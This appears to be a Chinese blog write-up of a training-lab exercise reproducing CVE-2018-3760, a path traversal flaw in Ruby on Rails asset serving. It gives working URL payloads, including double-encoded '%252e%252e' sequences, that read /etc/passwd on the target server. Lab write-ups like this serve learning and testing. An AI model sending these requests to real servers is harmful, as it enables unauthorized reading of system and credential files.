墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

打开 web 页面:

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

cs 复制代码
/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

cs 复制代码
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
相关推荐
zr52685544714 小时前
PCIe-PN卡(三格电子)
网络
有来技术15 小时前
Spring Boot 4 + Vue3 企业级多租户 SaaS:从共享 Schema 架构到商业化套餐设计
java·vue.js·spring boot·后端
无名的小三轮15 小时前
防火墙基础实验:智能选路下的透明DNS选路配置
网络
一轮弯弯的明月15 小时前
TCP传输大致过程、流量控制与拥塞控制
网络·tcp/ip·计算机网络·学习心得
犀思云15 小时前
如何通过网络即服务平台实现企业数字化转型?
运维·网络·人工智能·系统架构·机器人
皇帝要考研15 小时前
【ISO 13400-2:2019】核心配置项
网络·网络协议
东东51616 小时前
学院个人信息管理系统 (springboot+vue)
vue.js·spring boot·后端·个人开发·毕设
犀思云16 小时前
企业端到端NaaS连接的优势与应用
网络·人工智能·机器人·智能仓储·专线
三水不滴16 小时前
Redis缓存更新策略
数据库·经验分享·redis·笔记·后端·缓存
Godspeed Zhao16 小时前
现代智能汽车系统——总线技术1
网络·汽车·php